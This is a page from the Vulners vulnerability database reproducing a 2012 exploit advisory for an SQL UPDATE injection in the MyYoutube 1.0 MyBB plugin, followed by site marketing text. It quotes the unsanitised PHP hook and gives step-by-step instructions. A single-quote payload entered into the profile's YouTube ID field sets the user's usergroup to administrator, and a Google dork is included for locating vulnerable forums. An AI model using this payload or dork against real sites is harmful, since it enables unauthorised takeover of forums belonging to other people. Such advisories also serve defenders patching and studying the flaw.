Vulners
Lucene search
MyBB MyYoutube 1.0 SQL Injection
`# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.
# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"
# Date: 12.10.2012
# Exploit Author: Zixem
# Vendor Homepage: http://www.mybb-es.com
# Software Link: http://mods.mybb.com/view/myyoutube
# Version: 1.0
# Tested on: Linux.
MyYoutube plugin suffers from POST SQL UPDATE injection.
The vulnerabillity exist within youtube.php :
<?php
$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/
function youtube_update($ytb) /*Line 128*/
{
global $mybb;
if(isset($mybb->input['ytb']))
{
$ytb->user_update_data['ytb'] = $mybb->input['ytb'];
}
}
?>
Insturctions:
(1) Go to usercp.php?action=profile
(2) http://i.imgur.com/gPYdq.png
Enter this in the youtube ID field(just like in the picture): x', usergroup='4
(3) Press on the update button.
(4) You're an admin now :3
If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.
PoC:
before: http://i.imgur.com/aPFsz.png
While exploiting: http://i.imgur.com/gPYdq.png
Result: http://i.imgur.com/4ezpF.png
http://twitter.com/z1xem
-Zixem
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2012 00:00Current